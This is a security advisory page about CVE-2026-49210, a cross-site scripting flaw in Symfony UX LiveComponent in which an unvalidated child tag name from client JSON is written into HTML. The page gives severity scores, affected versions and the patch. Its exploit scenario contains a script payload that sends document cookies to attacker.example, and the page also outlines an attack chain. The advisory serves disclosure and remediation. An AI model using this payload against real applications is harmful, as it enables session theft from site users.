Skip to main content

Symfony UX LiveComponent CVE-2026-49210

LOW
Cross-site Scripting (XSS) (CWE-79)
2026-06-19 https://github.com/symfony/ux
2.3
CVSS 4.0 · Vendor: https://github.com/symfony/ux

Severity by source

Vendor (https://github.com/symfony/ux) PRIMARY
2.3 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.7 MEDIUM

AV:N because the endpoint is network-accessible; AC:H because exploitation requires non-default CORS or a same-origin pivot; UI:R because a victim must trigger the component re-render; S:C and C:L/I:L reflect standard reflected-XSS scope change with session/data impact.

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (https://github.com/symfony/ux).

CVSS VectorVendor: https://github.com/symfony/ux

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
CVSS changed
Jul 17, 2026 - 17:22 NVD
2.3 (LOW)
Source Code Evidence Fetched
Jun 19, 2026 - 21:43 vuln.today
Analysis Generated
Jun 19, 2026 - 21:43 vuln.today

DescriptionCVE.org

Description

Symfony\UX\LiveComponent\Util\ChildComponentPartialRenderer::createHtml() interpolates the $childTag argument directly into the HTML output as a tag name, without escaping or validation. The value originates from client-controlled JSON (children[id].tag) parsed by LiveComponentSubscriber and propagated through InterceptChildComponentRenderSubscriber, so an attacker who can reach the Live Component endpoint can inject arbitrary HTML, including <script> tags, on any re-render of a Live Component that contains at least one child component.

In the default configuration, the Live Component endpoint is gated by an Accept: application/vnd.live-component+html request-header check that cannot be set cross-origin without a CORS preflight, so the issue is primarily a defense-in-depth gap. It becomes directly exploitable on applications that have relaxed CORS to allow this header from untrusted origins, or that have been pivoted from another same-origin XSS.

Resolution

ChildComponentPartialRenderer now validates $childTag against a strict HTML tag-name regex before interpolating it, and rejects any value that doesn't match. Anything that wouldn't be a valid HTML tag is dropped before reaching the response.

The patch for this issue is available here for branch 2.x (and forward-ported to 3.x).

Credits

Symfony would like to thank Pascal Cescon for reporting the issue and Hugo Alliaume for providing the fix.

AnalysisAI

Cross-site scripting in symfony/ux-live-component allows network-accessible attackers to inject arbitrary HTML - including script tags - into re-rendered Live Component responses by supplying a malicious tag name via client-controlled JSON. Affected versions span composer/symfony/ux-live-component >= 2.8.0 < 2.36.0 and >= 3.0.0 < 3.1.0. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker identifies CORS-permissive Live Component endpoint
Delivery
Craft JSON payload with malicious children[id].tag value
Exploit
Send re-render request with Accept: application/vnd.live-component+html header
Execution
Server interpolates unsanitized tag into HTML response
Persist
Victim browser injects response into DOM
Impact
Injected script executes in application origin context

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to be able to send a request with the Accept: application/vnd.live-component+html header to the application's Live Component endpoint. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world exploitability is meaningfully constrained by the default same-origin restriction: the Live Component endpoint requires the Accept: application/vnd.live-component+html header, which browsers cannot send cross-origin without a CORS preflight. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker targeting an application with permissive CORS (allowing the Accept: application/vnd.live-component+html header cross-origin) crafts a malicious web page that causes a victim's browser to issue a Live Component re-render request with children[id].tag set to a payload such as li><script>document.location='https://attacker.example/steal?c='+document.cookie</script><li. The server interpolates this value unvalidated into the HTML response, which the Symfony UX JavaScript runtime injects into the victim's DOM, executing the script in the context of the target application's origin. …
Remediation The primary fix is to upgrade symfony/ux-live-component to 2.36.0 (for 2.x installations) or 3.1.0 (for 3.x installations). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-49210 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy